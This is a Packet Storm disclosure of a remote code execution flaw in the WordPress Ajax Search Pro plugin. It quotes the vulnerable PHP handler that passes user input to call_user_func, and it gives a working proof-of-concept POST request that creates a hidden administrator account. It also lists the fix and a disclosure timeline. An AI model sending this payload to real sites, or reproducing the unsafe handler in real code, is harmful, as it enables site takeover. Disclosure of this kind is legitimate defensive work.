WordPress Ajax Search Pro plugin suffered from a remote code execution vulnerability.
5e6475faedc63a601f3aa6133883268940ff45a73b0f968fdc25e796ce956a12------------------------------------------------------------------------------
WordPress ajax-search-pro Plugin Remote Code Execution
------------------------------------------------------------------------------
[-] Plugin Link:
http://codecanyon.net/item/ajax-search-pro-for-wordpress-live-search-plugin/3357410
also affected:
https://wordpress.org/plugins/ajax-search-lite/
https://wordpress.org/plugins/related-posts-lite/
[-] Vulnerability Description:
This vulnerability allows any registered user to execute arbitrary functions
vulnerability code:
add_action('wp_ajax_wpdreams-ajaxinput', "wpdreams_ajaxinputcallback");
if (!function_exists("wpdreams_ajaxinputcallback")) {
function wpdreams_ajaxinputcallback() {
$param = $_POST;
echo call_user_func($_POST['wpdreams_callback'], $param);
exit;
}
}
this will allow any registered user to execute any function he wants with
1st param set to array($_POST)
since wordpress core provides some functions that accept 1st param as an
array then,
wp_insert_user have a role option for the user you are inserting, this
option can insert a new administrator
[-] Proof of Concept:
this will register an administrator with username "xADMIN" and password
"xPASS"
url:
http://localhost/x/wordpress/wp-admin/admin-ajax.php?page=ajax-search-pro/backend/settings.php&action=wpdreams-ajaxinput
post data:
wpdreams_callback=wp_insert_user&user_login=xADMIN&user_pass=xPASS&role=administrator
[-] Fix:
Updated to the latest version.
[-] Timeline:
09 March - Vendor Notified
09 March - Fix Released
18 March - Public Disclosure
[-] Refernces:
http://research.evex.pw/?vuln=9 <http://research.evex.pw/?vuln=8>
@Evex_1337
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed